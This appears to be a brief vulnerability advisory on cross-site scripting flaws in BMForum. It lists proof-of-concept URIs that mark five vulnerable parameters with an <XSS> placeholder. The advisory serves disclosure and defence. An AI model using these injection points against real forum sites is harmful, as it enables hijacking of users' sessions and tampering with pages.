|
|
BMForum Multiple Cross Site Scripting Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI. The following proof-of-concept URIs are available: http://www.example.com/[BBForum_path]/index.php?outpused=<XSS> http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS> http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS> http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS> http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS> |
|
Privacy Statement |